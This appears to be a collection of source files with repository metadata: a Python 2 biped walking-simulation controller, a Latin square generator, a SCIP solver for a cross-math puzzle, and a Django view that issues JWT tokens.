# viewer.doc.addRenderer('M_tc', yr.JointMotionRenderer(M_tc, (255,255,0), yr.LINK_BONE))
# viewer.doc.addRenderer('P_hat', yr.JointMotionRenderer(P_hat, (255,255,0), yr.LINK_BONE))
# viewer.doc.addRenderer('P', yr.JointMotionRenderer(P, (255,255,0), yr.LINK_BONE))
# viewer.doc.addRenderer('M_hat_tc_1', yr.JointMotionRenderer(M_hat_tc_1, (255,255,0), yr.LINK_BONE))
# viewer.doc.addRenderer('rd_CM', yr.PointsRenderer(rd_CM, (255,255,0)))
# viewer.doc.addRenderer('rd_CP', yr.PointsRenderer(rd_CP, (255,0,0)))
# viewer.doc.addRenderer('rd_CMP', yr.PointsRenderer(rd_CMP, (0,255,0)))
viewer.doc.addRenderer('forces', yr.ForcesRenderer(rd_forces, rd_force_points, (255,0,0), ratio=.01, lineWidth=.04, fromPoint=False))
# viewer.doc.addRenderer('torques', yr.VectorsRenderer(rd_torques, rd_joint_positions, (255,0,0)))
# viewer.doc.addRenderer('rd_point1', yr.PointsRenderer(rd_point1, (0,255,0)))
# viewer.doc.addRenderer('rd_point2', yr.PointsRenderer(rd_point2, (255,0,0)))
# viewer.doc.addRenderer('rd_vec1', yr.VectorsRenderer(rd_vec1, rd_vecori1, (255,0,0)))
# viewer.doc.addRenderer('rd_vec2', yr.VectorsRenderer(rd_vec2, rd_vecori2, (0,255,0)))
# viewer.doc.addRenderer('rd_frame1', yr.FramesRenderer(rd_frame1, (0,200,200)))
# viewer.doc.addRenderer('rd_frame2', yr.FramesRenderer(rd_frame2, (200,200,0)))
# viewer.setMaxFrame(len(motion_ori)-1)
if not REPEATED:
viewer.setMaxFrame(len(motion_ori)-1)
else:
viewer.setMaxFrame(1440)
if CAMERA_TRACKING:
if MULTI_VIEWER:
cameraTargets1 = [None] * (viewer.getMaxFrame()+1)
cameraTargets2 = [None] * (viewer.getMaxFrame()+1)
else:
cameraTargets = [None] * (viewer.getMaxFrame()+1)
if TORQUE_PLOT:
rhip_torques = [0.]*viewer.getMaxFrame()
rknee_torques = [0.]*viewer.getMaxFrame()
rankle_torques = [0.]*viewer.getMaxFrame()
pt = [0.]
def postFrameCallback_Always(frame):
if frame==1: pt[0] = time.time()
if frame==31: print 'elapsed time for 30 frames:', time.time()-pt[0]
if CAMERA_TRACKING:
if MULTI_VIEWER:
if cameraTargets1[frame]==None:
cameraTargets1[frame] = motionModel.getBodyPositionGlobal(0)
# cameraTargets1[frame] = motion_ori[frame].getJointPositionGlobal(0)
viewer.setCameraTarget1(cameraTargets1[frame])
if cameraTargets2[frame]==None:
cameraTargets2[frame] = controlModel.getJointPositionGlobal(0)
viewer.setCameraTarget2(cameraTargets2[frame])
else:
if cameraTargets[frame]==None:
cameraTargets[frame] = controlModel.getJointPositionGlobal(0)
viewer.setCameraTarget(cameraTargets[frame])
if plot!=None:
plot.updateVline(frame)
viewer.setPostFrameCallback_Always(postFrameCallback_Always)
plot = None
# plot = ymp.InteractivePlot()
if plot!=None:
plot.setXlimit(0, len(motion_ori))
plot.setYlimit(0., 1.)
plot.addDataSet('zero')
plot.addDataSet('diff')
plot.addDataSet('debug1')
plot.addDataSet('debug2')
def viewer_onClose(data):
if plot!=None:
plot.close()
viewer.onClose(data)
viewer.callback(viewer_onClose)
def simulateCallback(frame):
# seginfo
segIndex = seg_index[0]
curState = seginfo[segIndex]['state']
curInterval = yma.offsetInterval(acc_offset[0], seginfo[segIndex]['interval'])
stanceLegs = seginfo[segIndex]['stanceHips']
swingLegs = seginfo[segIndex]['swingHips']
stanceFoots = seginfo[segIndex]['stanceFoots']
swingFoots = seginfo[segIndex]['swingFoots']
swingKnees = seginfo[segIndex]['swingKnees']
groundHeight = seginfo[segIndex]['ground_height']
# maxStfPushFrame = seginfo[segIndex]['max_stf_push_frame']
prev_frame = frame-1 if frame>0 else 0
# prev_frame = frame
# information
# dCM_tar = yrp.getCM(motion_seg.getJointVelocitiesGlobal(frame), bodyMasses, upperMass, uppers)
# CM_tar = yrp.getCM(motion_seg.getJointPositionsGlobal(frame), bodyMasses, upperMass, uppers)
## dCM_tar = yrp.getCM(motion_seg.getJointVelocitiesGlobal(frame), bodyMasses, totalMass)
## CM_tar = yrp.getCM(motion_seg.getJointPositionsGlobal(frame), bodyMasses, totalMass)
# stf_tar = motion_seg.getJointPositionGlobal(stanceFoots[0], frame)
# CMr_tar = CM_tar - stf_tar
dCM_tar = motion_seg.getJointVelocityGlobal(0, prev_frame)
CM_tar = motion_seg.getJointPositionGlobal(0, prev_frame)
# dCM_tar = yrp.getCM(motion_seg.getJointVelocitiesGlobal(prev_frame), bodyMasses, upperMass, uppers)
# CM_tar = yrp.getCM(motion_seg.getJointPositionsGlobal(prev_frame), bodyMasses, upperMass, uppers)
# dCM_tar = yrp.getCM(motion_seg.getJointVelocitiesGlobal(prev_frame), bodyMasses, totalMass)
# CM_tar = yrp.getCM(motion_seg.getJointPositionsGlobal(prev_frame), bodyMasses, totalMass)
stf_tar = motion_seg.getJointPositionGlobal(stanceFoots[0], prev_frame)
CMr_tar = CM_tar - stf_tar
dCM = avg_dCM[0]
CM = controlModel.getJointPositionGlobal(0)
# CM = yrp.getCM(controlModel.getJointPositionsGlobal(), bodyMasses, upperMass, uppers)
# CM = yrp.getCM(controlModel.getJointPositionsGlobal(), bodyMasses, totalMass)
CMreal = yrp.getCM(controlModel.getJointPositionsGlobal(), bodyMasses, totalMass)
stf = controlModel.getJointPositionGlobal(stanceFoots[0])
CMr = CM - stf
diff_dCM = mm.projectionOnPlane(dCM-dCM_tar, (1,0,0), (0,0,1))
diff_dCM_axis = np.cross((0,1,0), diff_dCM)
rd_vec1[0] = diff_dCM; rd_vecori1[0] = CM_tar
diff_CMr = mm.projectionOnPlane(CMr-CMr_tar, (1,0,0), (0,0,1))
# rd_vec1[0] = diff_CMr; rd_vecori1[0] = stf_tar
diff_CMr_axis = np.cross((0,1,0), diff_CMr)
direction = mm.normalize2(mm.projectionOnPlane(dCM_tar, (1,0,0), (0,0,1)))
# direction = mm.normalize2(mm.projectionOnPlane(dCM, (1,0,0), (0,0,1)))
directionAxis = np.cross((0,1,0), direction)
diff_dCM_sag, diff_dCM_cor = mm.projectionOnVector2(diff_dCM, direction)
# rd_vec1[0] = diff_dCM_sag; rd_vecori1[0] = CM_tar
diff_dCM_sag_axis = np.cross((0,1,0), diff_dCM_sag)
diff_dCM_cor_axis = np.cross((0,1,0), diff_dCM_cor)
diff_CMr_sag, diff_CMr_cor = mm.projectionOnVector2(diff_CMr, direction)
diff_CMr_sag_axis = np.cross((0,1,0), diff_CMr_sag)
diff_CMr_cor_axis = np.cross((0,1,0), diff_CMr_cor)
t = (frame-curInterval[0])/float(curInterval[1]-curInterval[0])
t_raw = t
if t>1.: t=1.
p_root = motion_stitch[frame].getJointPositionGlobal(0)
R_root = motion_stitch[frame].getJointOrientationGlobal(0)
motion_seg_orig.goToFrame(frame)
motion_seg.goToFrame(frame)
motion_stitch.goToFrame(frame)
motion_debug1.append(motion_stitch[frame].copy())
motion_debug1.goToFrame(frame)
motion_debug2.append(motion_stitch[frame].copy())
motion_debug2.goToFrame(frame)
motion_debug3.append(motion_stitch[frame].copy())
motion_debug3.goToFrame(frame)
# paper implementation
M_tc.append(motion_stitch[prev_frame])
M_tc.goToFrame(frame)
P_hat.append(M_tc[frame].copy())
P_hat.goToFrame(frame)
p_temp = ym.JointPosture(skeleton)
p_temp.rootPos = controlModel.getJointPositionGlobal(0)
p_temp.setJointOrientationsLocal(controlModel.getJointOrientationsLocal())
P.append(p_temp)
P.goToFrame(frame)
# stance foot stabilize
motion_stf_stabilize.append(motion_stitch[frame].copy())
motion_stf_stabilize.goToFrame(frame)
if STANCE_FOOT_STABILIZE:
for stanceFoot in stanceFoots:
R_target_foot = motion_seg[frame].getJointOrientationGlobal(stanceFoot)
R_current_foot = motion_stf_stabilize[frame].getJointOrientationGlobal(stanceFoot)
motion_stf_stabilize[frame].setJointOrientationGlobal(stanceFoot, cm.slerp(R_current_foot, R_target_foot , stf_stabilize_func(t)))
# R_target_foot = motion_seg[frame].getJointOrientationLocal(stanceFoot)
# R_current_foot = motion_stf_stabilize[frame].getJointOrientationLocal(stanceFoot)
# motion_stf_stabilize[frame].setJointOrientationLocal(stanceFoot, cm.slerp(R_current_foot, R_target_foot , stf_stabilize_func(t)))
# match stance leg
motion_match_stl.append(motion_stf_stabilize[frame].copy())
motion_match_stl.goToFrame(frame)
if MATCH_STANCE_LEG:
if curState!=yba.GaitState.STOP:
for i in range(len(stanceLegs)):
stanceLeg = stanceLegs[i]
stanceFoot = stanceFoots[i]
# # motion stance leg -> character stance leg as time goes
R_motion = motion_match_stl[frame].getJointOrientationGlobal(stanceLeg)
R_character = controlModel.getJointOrientationGlobal(stanceLeg)
motion_match_stl[frame].setJointOrientationGlobal(stanceLeg, cm.slerp(R_motion, R_character, match_stl_func(t)))
# t_y = match_stl_func_y(t)
# t_xz = match_stl_func(t)
#
# R_motion = motion_match_stl[frame].getJointOrientationGlobal(stanceLeg)
# R_character = controlModel.getJointOrientationGlobal(stanceLeg)
# R = np.dot(R_character, R_motion.T)
# R_y, R_xz = mm.projectRotation((0,1,0), R)
# motion_match_stl[frame].mulJointOrientationGlobal(stanceLeg, mm.scaleSO3(R_xz, t_xz))
# motion_match_stl[frame].mulJointOrientationGlobal(stanceLeg, mm.scaleSO3(R_y, t_y))
# swing foot placement
motion_swf_placement.append(motion_match_stl[frame].copy())
motion_swf_placement.goToFrame(frame)
if SWING_FOOT_PLACEMENT:
t_swing_foot_placement = swf_placement_func(t);
if extended[0]:
R_swp_sag = prev_R_swp[0][0]
R_swp_cor = prev_R_swp[0][1]
else:
R_swp_sag = mm.I_SO3(); R_swp_cor = mm.I_SO3()
R_swp_cor = np.dot(R_swp_cor, mm.exp(diff_dCM_cor_axis * K_swp_vel_cor * -t_swing_foot_placement))
if np.dot(direction, diff_CMr_sag) < 0:
R_swp_sag = np.dot(R_swp_sag, mm.exp(diff_dCM_sag_axis * K_swp_vel_sag * -t_swing_foot_placement))
R_swp_sag = np.dot(R_swp_sag, mm.exp(diff_CMr_sag_axis * K_swp_pos_sag * -t_swing_foot_placement))
else:
R_swp_sag = np.dot(R_swp_sag, mm.exp(diff_dCM_sag_axis * K_swp_vel_sag_faster * -t_swing_foot_placement))
R_swp_sag = np.dot(R_swp_sag, mm.exp(diff_CMr_sag_axis * K_swp_pos_sag_faster * -t_swing_foot_placement))
R_swp_cor = np.dot(R_swp_cor, mm.exp(diff_CMr_cor_axis * K_swp_pos_cor * -t_swing_foot_placement))
for i in range(len(swingLegs)):
swingLeg = swingLegs[i]
swingFoot = swingFoots[i]
# save swing foot global orientation
# R_swf = motion_swf_placement[frame].getJointOrientationGlobal(swingFoot)
# rotate swing leg
motion_swf_placement[frame].mulJointOrientationGlobal(swingLeg, R_swp_sag)
motion_swf_placement[frame].mulJointOrientationGlobal(swingLeg, R_swp_cor)
# restore swing foot global orientation
# motion_swf_placement[frame].setJointOrientationGlobal(swingFoot, R_swf)
prev_R_swp[0] = (R_swp_sag, R_swp_cor)
# swing foot height
motion_swf_height.append(motion_swf_placement[frame].copy())
motion_swf_height.goToFrame(frame)
if SWING_FOOT_HEIGHT:
for swingFoot in swingFoots:
stanceFoot = stanceFoots[0]
# save foot global orientation
R_foot = motion_swf_height[frame].getJointOrientationGlobal(swingFoot)
R_stance_foot = motion_swf_height[frame].getJointOrientationGlobal(stanceFoot)
if OLD_SWING_HEIGHT:
height_tar = motion_swf_height[frame].getJointPositionGlobal(swingFoot)[1] - motion_swf_height[frame].getJointPositionGlobal(stanceFoot)[1]
else:
height_tar = motion_swf_height[prev_frame].getJointPositionGlobal(swingFoot)[1] - groundHeight
d_height_tar = motion_swf_height.getJointVelocityGlobal(swingFoot, prev_frame)[1]
# height_tar += c_swf_mid_offset * swf_height_sine_func(t)
# motion_debug1[frame] = motion_swf_height[frame].copy()
# rotate
motion_swf_height[frame].rotateByTarget(controlModel.getJointOrientationGlobal(0))
# motion_debug2[frame] = motion_swf_height[frame].copy()
# motion_debug2[frame].translateByTarget(controlModel.getJointPositionGlobal(0))
if OLD_SWING_HEIGHT:
height_cur = motion_swf_height[frame].getJointPositionGlobal(swingFoot)[1] - motion_swf_height[frame].getJointPositionGlobal(stanceFoot)[1]
else:
height_cur = controlModel.getJointPositionGlobal(swingFoot)[1] - halfFootHeight - c_swf_offset
d_height_cur = controlModel.getJointVelocityGlobal(swingFoot)[1]
if OLD_SWING_HEIGHT:
offset_height = (height_tar - height_cur) * swf_height_func(t) * c5
else:
offset_height = ((height_tar - height_cur) * c5
+ (d_height_tar - d_height_cur) * c6) * swf_height_func(t)
offset_sine = c_swf_mid_offset * swf_height_sine_func(t)
# offset_sine = 0.
offset = 0.
offset += offset_height
offset += offset_sine
if offset > 0.:
newPosition = motion_swf_height[frame].getJointPositionGlobal(swingFoot)
newPosition[1] += offset
aik.ik_analytic(motion_swf_height[frame], swingFoot, newPosition)
else:
if HIGHER_OFFSET:
newPosition = motion_swf_height[frame].getJointPositionGlobal(stanceFoot)
newPosition[1] -= offset
aik.ik_analytic(motion_swf_height[frame], stanceFoot, newPosition)
# return
# motion_debug3[frame] = motion_swf_height[frame].copy()
# motion_debug3[frame].translateByTarget(controlModel.getJointPositionGlobal(0))
motion_swf_height[frame].rotateByTarget(R_root)
# restore foot global orientation
motion_swf_height[frame].setJointOrientationGlobal(swingFoot, R_foot)
motion_swf_height[frame].setJointOrientationGlobal(stanceFoot, R_stance_foot)
if plot!=None:
plot.addDataPoint('debug1', frame, offset_height)
plot.addDataPoint('debug2', frame, height_tar - height_cur)
# plot.addDataPoint('diff', frame, diff)
# swing foot orientation
motion_swf_orientation.append(motion_swf_height[frame].copy())
motion_swf_orientation.goToFrame(frame)
if SWING_FOOT_ORIENTATION:
swf_orientation_func = yfg.concatenate([yfg.zero, yfg.hermite2nd, yfg.one], [.25, .75])
for swingFoot in swingFoots:
R_target_foot = motion_seg[curInterval[1]].getJointOrientationGlobal(swingFoot)
R_current_foot = motion_swf_orientation[frame].getJointOrientationGlobal(swingFoot)
motion_swf_orientation[frame].setJointOrientationGlobal(swingFoot, cm.slerp(R_current_foot, R_target_foot, swf_orientation_func(t)))
# swf_stabilize_func = yfg.concatenate([yfg.hermite2nd, yfg.one], [c_taking_duration])
# push orientation
# for swingFoot in swingFoots:
# R_target_foot = motion_seg[frame].getJointOrientationGlobal(swingFoot)
# R_current_foot = motion_swf_orientation[frame].getJointOrientationGlobal(swingFoot)
# motion_swf_orientation[frame].setJointOrientationGlobal(swingFoot, cm.slerp(R_current_foot, R_target_foot , swf_stabilize_func(t)))
# stance foot push
motion_stf_push.append(motion_swf_orientation[frame].copy())
motion_stf_push.goToFrame(frame)
if STANCE_FOOT_PUSH:
for swingFoot in swingFoots:
# max_t = (maxStfPushFrame)/float(curInterval[1]-curInterval[0])
# stf_push_func = yfg.concatenate([yfg.sine, yfg.zero], [max_t*2])
stf_push_func = yfg.concatenate([yfg.sine, yfg.zero], [c_taking_duration*2])
R_swp_sag = mm.I_SO3()
# R_swp_sag = np.dot(R_swp_sag, mm.exp(diff_dCM_sag_axis * K_stp_vel * -stf_push_func(t)))
# if step_length_cur[0] < step_length_tar[0]:
# ratio = step_length_cur[0] / step_length_tar[0]
# R_max = maxmaxStfPushFrame
# R_zero =
R_swp_sag = np.dot(R_swp_sag, mm.exp((step_length_tar[0] - step_length_cur[0])*step_axis[0] * K_stp_pos * -stf_push_func(t)))
motion_stf_push[frame].mulJointOrientationGlobal(swingFoot, R_swp_sag)
# stance foot balancing
motion_stf_balancing.append(motion_stf_push[frame].copy())
motion_stf_balancing.goToFrame(frame)
if STANCE_FOOT_BALANCING:
R_stb = mm.exp(diff_dCM_axis * K_stb_vel * stf_balancing_func(t))
R_stb = np.dot(R_stb, mm.exp(diff_CMr_axis * K_stb_pos * stf_balancing_func(t)))
for stanceFoot in stanceFoots:
if frame < 5: continue
motion_stf_balancing[frame].mulJointOrientationGlobal(stanceFoot, R_stb)
# control trajectory
motion_control.append(motion_stf_balancing[frame].copy())
motion_control.goToFrame(frame)
#=======================================================================
# tracking with inverse dynamics
#=======================================================================
th_r = motion_control.getDOFPositions(frame)
th = controlModel.getDOFPositions()
dth_r = motion_control.getDOFVelocities(frame)
dth = controlModel.getDOFVelocities()
ddth_r = motion_control.getDOFAccelerations(frame)
ddth_des = yct.getDesiredDOFAccelerations(th_r, th, dth_r, dth, ddth_r, Kt, Dt)
#=======================================================================
# simulation
#=======================================================================
CP = mm.v3(0.,0.,0.)
F = mm.v3(0.,0.,0.)
avg_dCM[0] = mm.v3(0.,0.,0.)
# external force rendering info
del rd_forces[:]; del rd_force_points[:]
for fi in forceInfos:
if fi.startFrame <= frame and frame < fi.startFrame + fi.duration*(1/frameTime):
rd_forces.append(fi.force)
rd_force_points.append(controlModel.getBodyPositionGlobal(fi.targetBody) + -mm.normalize2(fi.force)*.2)
for i in range(stepsPerFrame):
bodyIDs, contactPositions, contactPositionLocals, contactForces = vpWorld.calcPenaltyForce(bodyIDsToCheck, mus, Ks, Ds)
vpWorld.applyPenaltyForce(bodyIDs, contactPositionLocals, contactForces)
# apply external force
for fi in forceInfos:
if fi.startFrame <= frame and frame < fi.startFrame + fi.duration*(1/frameTime):
controlModel.applyBodyForceGlobal(fi.targetBody, fi.force)
controlModel.setDOFAccelerations(ddth_des)
controlModel.solveHybridDynamics()
# # apply external force
# for fi in forceInfos:
# if fi.startFrame <= frame and frame < fi.startFrame + fi.duration*(1/frameTime):
# controlModel.applyBodyForceGlobal(fi.targetBody, fi.force)
vpWorld.step()
# yvu.align2D(controlModel)
if len(contactForces) > 0:
CP += yrp.getCP(contactPositions, contactForces)
F += sum(contactForces)
avg_dCM[0] += controlModel.getJointVelocityGlobal(0)
# avg_dCM[0] += yrp.getCM(controlModel.getJointVelocitiesGlobal(), bodyMasses, upperMass, uppers)
# avg_dCM[0] += yrp.getCM(controlModel.getJointVelocitiesGlobal(), bodyMasses, totalMass)
# if len(stanceFoots)>0:
# avg_stf_v[0] += controlModel.getJointVelocityGlobal(stanceFoots[0])
# avg_stf_av[0] += controlModel.getJointAngVelocityGlobal(stanceFoots[0])
CP /= stepsPerFrame
F /= stepsPerFrame
avg_dCM[0] /= stepsPerFrame
# if len(stanceFoots)>0:
# avg_stf_v[0] /= stepsPerFrame
# avg_stf_av[0] /= stepsPerFrame
# rd_vec1[0] = avg_stf_av[0]; rd_vec1[0][0] = 0.; rd_vec1[0][2] = 0.
# rd_vecori1[0]= controlModel.getJointPositionGlobal(stanceFoots[0])
#=======================================================================
# segment editing
#=======================================================================
lastFrame = False
if SEGMENT_EDITING:
if curState==yba.GaitState.STOP:
if frame == len(motion_seg)-1:
lastFrame = True
elif (curState==yba.GaitState.LSWING or curState==yba.GaitState.RSWING) and t>c_min_contact_time:
swingID = lID if curState==yba.GaitState.LSWING else rID
contact = False
if swingID in bodyIDs:
minContactVel = 1000.
for i in range(len(bodyIDs)):
if bodyIDs[i]==swingID:
vel = controlModel.getBodyVelocityGlobal(swingID, contactPositionLocals[i])
vel[1] = 0
contactVel = mm.length(vel)
if contactVel < minContactVel: minContactVel = contactVel
if minContactVel < c_min_contact_vel: contact = True
extended[0] = False
if contact:
# print frame, 'foot touch'
lastFrame = True
acc_offset[0] += frame - curInterval[1]
elif frame == len(motion_seg)-1:
print frame, 'extend frame', frame+1
preserveJoints = []
# preserveJoints = [lFoot, rFoot]
# preserveJoints = [lFoot, rFoot, lKnee, rKnee]
# preserveJoints = [lFoot, rFoot, lKnee, rKnee, lUpLeg, rUpLeg]
stanceKnees = [rKnee] if curState==yba.GaitState.LSWING else [lKnee]
preserveJoints = [stanceFoots[0], stanceKnees[0], stanceLegs[0]]
diff = 3
motion_seg_orig.extend([motion_seg_orig[-1]])
motion_seg.extend(ymt.extendByIntegration_root(motion_seg, 1, diff))
motion_stitch.extend(ymt.extendByIntegration_constant(motion_stitch, 1, preserveJoints, diff))
# # extend for swing foot ground speed matching & swing foot height lower
## extendedPostures = ymt.extendByIntegration(motion_stitch, 1, preserveJoints, diff)
## extendedPostures = [motion_stitch[-1]]
##
# extendFrameNum = frame - curInterval[1] + 1
# k = 1.-extendFrameNum/5.
# if k<0.: k=0.
# extendedPostures = ymt.extendByIntegrationAttenuation(motion_stitch, 1, preserveJoints, diff, k)
#
## if len(swingFoots)>0 and np.inner(dCM_tar, dCM)>0.:
## print frame, 'speed matching'
## R_swf = motion_stitch[-1].getJointOrientationGlobal(swingFoots[0])
##
## p_swf = motion_stitch[-1].getJointPositionGlobal(swingFoots[0])
## v_swf = motion_stitch.getJointVelocityGlobal(swingFoots[0], frame-diff, frame)
## a_swf = motion_stitch.getJointAccelerationGlobal(swingFoots[0], frame-diff, frame)
## p_swf += v_swf * (frameTime) + a_swf * (frameTime)*(frameTime)
## aik.ik_analytic(extendedPostures[0], swingFoots[0], p_swf)
##
## extendedPostures[0].setJointOrientationGlobal(swingFoots[0], R_swf)
#
# motion_stitch.extend(extendedPostures)
extended[0] = True
else:
if frame == len(motion_seg)-1: lastFrame = True
if lastFrame:
if segIndex < len(segments)-1:
print '%d (%d): end of %dth seg (%s, %s)'%(frame, frame-curInterval[1],segIndex, yba.GaitState.text[curState], curInterval)
if plot!=None: plot.addDataPoint('diff', frame, (frame-curInterval[1])*.01)
if len(stanceFoots)>0 and len(swingFoots)>0:
# step_cur = controlModel.getJointPositionGlobal(swingFoots[0]) - controlModel.getJointPositionGlobal(stanceFoots[0])
# step_tar = motion_seg[curInterval[1]].getJointPositionGlobal(swingFoots[0]) - motion_seg[curInterval[1]].getJointPositionGlobal(stanceFoots[0])
step_cur = controlModel.getJointPositionGlobal(0) - controlModel.getJointPositionGlobal(stanceFoots[0])
step_tar = motion_seg[curInterval[1]].getJointPositionGlobal(0) - motion_seg[curInterval[1]].getJointPositionGlobal(stanceFoots[0])
step_cur = mm.projectionOnPlane(step_cur, (1,0,0), (0,0,1))
step_tar = mm.projectionOnPlane(step_tar, (1,0,0), (0,0,1))
step_cur_sag, step_cur_cor = mm.projectionOnVector2(step_cur, direction)
step_tar_sag, step_tar_cor = mm.projectionOnVector2(step_tar, direction)
step_length_tar[0] = mm.length(step_tar_sag)
if np.inner(step_tar_sag, step_cur_sag) > 0:
step_length_cur[0] = mm.length(step_cur_sag)
else:
step_length_cur[0] = -mm.length(step_cur_sag)
step_axis[0] = directionAxis
# rd_vec1[0] = step_tar_sag
# rd_vecori1[0] = motion_seg[curInterval[1]].getJointPositionGlobal(stanceFoots[0])
# rd_vec2[0] = step_cur_sag
# rd_vecori2[0] = controlModel.getJointPositionGlobal(stanceFoots[0])
seg_index[0] += 1
curSeg = segments[seg_index[0]]
stl_y_limit_num[0] = 0
stl_xz_limit_num[0] = 0
del motion_seg_orig[frame+1:]
motion_seg_orig.extend(ymb.getAttachedNextMotion(curSeg, motion_seg_orig[-1], False, False))
del motion_seg[frame+1:]
del motion_stitch[frame+1:]
transitionLength = len(curSeg)-1
# motion_seg.extend(ymb.getAttachedNextMotion(curSeg, motion_seg[-1], False, False))
# motion_stitch.extend(ymb.getStitchedNextMotion(curSeg, motion_control[-1], transitionLength, stitch_func, True, False))
d = motion_seg[-1] - curSeg[0]
d.rootPos[1] = 0.
motion_seg.extend(ymb.getAttachedNextMotion(curSeg, d, True, False))
d = motion_control[-1] - curSeg[0]
d.rootPos[1] = 0.
motion_stitch.extend(ymb.getStitchedNextMotion(curSeg, d, transitionLength, stitch_func, True, False))
# motion_seg.extend(ymb.getAttachedNextMotion(curSeg, motion_seg[-1], False, True))
# motion_stitch.extend(ymb.getStitchedNextMotion(curSeg, motion_control[-1], transitionLength, stitch_func, True, True))
else:
motion_seg_orig.append(motion_seg_orig[-1])
motion_seg.append(motion_seg[-1])
motion_stitch.append(motion_control[-1])
# rendering
motionModel.update(motion_ori[frame])
# motionModel.update(motion_seg[frame])
rd_CP[0] = CP
rd_CMP[0] = (CMreal[0] - (F[0]/F[1])*CMreal[1], 0, CMreal[2] - (F[2]/F[1])*CMreal[1])
if plot!=None:
plot.addDataPoint('zero', frame, 0)
plot.updatePoints()
viewer.setSimulateCallback(simulateCallback)
if MULTI_VIEWER:
viewer.startTimer(frameTime / 1.4)
else:
viewer.startTimer(frameTime * .1)
viewer.show()
Fl.run()
pass
push_simbicon_mass()
|
[
"garethvlf@gmail.com"
] |
garethvlf@gmail.com
|
b148450073878633fd932fa4d080860c99ef9e3c
|
8fef9b5472f031385a3c0145d94f95e03e2cecbc
|
/Latino.py
|
d1ce8a1a0b5f878f705868b3bc9c0ba4d3e92d55
|
[] |
no_license
|
RoyFlo360/ITQ-IA
|
cc709f2de12eeeee890b01c74a6a6ebc6d5f696a
|
8c7dba35eb0b1bb5c7f29a03edc90abf28db2d6a
|
refs/heads/master
| 2023-06-05T06:46:11.118285
| 2021-06-27T18:23:17
| 2021-06-27T18:23:17
| 380,809,737
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 770
|
py
|
# Builds a Latin square: each row counts upward from its start value, wrapping at the order,
# and each row starts one higher than the row above.
orden = int(input("Ingrese el Orden del Cuadrado : "))  # order (size) of the square
nInicial = int(input("Ingrese el Número Inicial : "))  # value placed in the top-left cell
while (nInicial > orden):
print("El numero superior izquierdo debe de ser menor o igual al orden del cuadrado")
nInicial = int(input("Ingrese el Número Inicial : "))
arreglo = []
nInicialF = nInicial
for fil in range(0, orden):
aAux = []
nInicialC = nInicialF
for col in range(0, orden):
aAux.append(nInicialC)
nInicialC += 1
if (nInicialC > orden):
nInicialC = 1
arreglo.append(aAux)
nInicialF += 1
if (nInicialF > orden):
nInicialF = 1
print()
for fil in range(0, orden):
for col in range(0, orden):
print(arreglo[fil][col], end=" ")
print()
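# Hedged worked example (not part of the original script): for orden = 3 and
# nInicial = 2, the loops above print the cyclically shifted rows
#   2 3 1
#   3 1 2
#   1 2 3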
|
[
"l16140648@queretaro.tecnm.mx"
] |
l16140648@queretaro.tecnm.mx
|
2d8118fb28a7b6c6d527581345523cf0485541b9
|
671e274094b889597a2eac44a8fc4bcf583df5ac
|
/qcp/one_hot_matrix.py
|
dbba43ca76f47915331a50ff165790af4d48ad2f
|
[] |
no_license
|
Isitar/migros-cross-math-solver
|
805a0f2bbf450cf172d4ce57f745bd59f780da11
|
b0893a2dd587a85c8d11359a604a2ee5e159987d
|
refs/heads/master
| 2020-12-10T20:02:06.640653
| 2020-01-15T22:16:53
| 2020-01-15T22:16:53
| 233,696,215
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,252
|
py
|
from pyscipopt import Model
model = Model("migros-cross-math")
x = []
for i in range(0, 9):
x.append([])
for j in range(0, 9):
x[i].append(model.addVar(f'x{i}_{j}', vtype="BINARY"))
constraints = []
# general cross-math rules
for x_i in x:
constr = 0
for x_i_j in x_i:
constr += x_i_j
constraints.append(constr == 1)
for j in range(0, len(x_i)):
constr = 0
for i in range(0, len(x)):
constr += x[i][j]
constraints.append(constr == 1)
vals = []
for x_i in x:
val = 0
for j in range(0, len(x_i)):
val += (j + 1) * x_i[j]
vals.append(val)
# actual cross-math
constraints.append((vals[0] - vals[1]) * vals[2] == 3)
constraints.append((vals[3] + vals[4]) * vals[5] == 20)
constraints.append((vals[6] + vals[7]) + vals[8] == 20)
constraints.append(vals[0] - vals[3] + vals[6] == 13)
constraints.append((vals[1] + vals[4]) / vals[7] == 1)
constraints.append((vals[2] * vals[5]) * vals[8] == 20)
model.setObjective(0)
for cons in constraints:
model.addCons(cons)
model.optimize()
sol = model.getBestSol()
for i in range(0, len(x)):
for j in range(0, len(x[i])):
if sol[x[i][j]] == 1:
print(j + 1, end='')
if (i + 1) % 3 == 0:
print()
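# Hedged usage sketch (not part of the original script): the row values can also be
# recovered directly from the one-hot solution and checked against a constraint.
solved_vals = [sum((j + 1) * round(sol[x[i][j]]) for j in range(9)) for i in range(9)]
assert (solved_vals[0] - solved_vals[1]) * solved_vals[2] == 3  # first cross-math equation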
|
[
"luescherpascal@gmail.com"
] |
luescherpascal@gmail.com
|
29a8581e55715c55b33da3a20d3f360ae5cb218f
|
26daf6ee609ffc04d426f17b726ce91dc68aef5d
|
/chat_project/chat_project/views.py
|
384efcc1ab16b4b9968736b1fd8c4344b3b83155
|
[] |
no_license
|
tapadiyapriyanka/chat-app
|
83c84f05de0b950fe98c03aa146c99088ff982a0
|
72d0156c27266dde4723ef18f7857928e9478e37
|
refs/heads/master
| 2021-09-06T02:01:25.032759
| 2017-12-28T14:08:49
| 2017-12-28T14:08:49
| 115,386,850
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,260
|
py
|
import datetime
import jwt
from django.conf import settings
from rest_framework import parsers, renderers, status
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.authtoken.serializers import AuthTokenSerializer
class JSONWebTokenAuth(APIView):
throttle_classes = ()
permission_classes = ()
parser_classes = (parsers.FormParser, parsers.MultiPartParser, parsers.JSONParser,)
renderer_classes = (renderers.JSONRenderer,)
serializer_class = AuthTokenSerializer
def post(self, request):
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
# print('test',serializer['username'])
            # AuthTokenSerializer exposes the validated fields via validated_data
            user = serializer.validated_data['username']
token = jwt.encode({
'username': user,
'iat': datetime.datetime.utcnow(),
'nbf': datetime.datetime.utcnow() + datetime.timedelta(minutes=-5),
'exp': datetime.datetime.utcnow() + datetime.timedelta(days=7)
}, settings.SECRET_KEY)
return Response({'token': token})
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
json_web_token_auth = JSONWebTokenAuth.as_view()
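# Hedged usage sketch (not part of the original file): a token issued above can be
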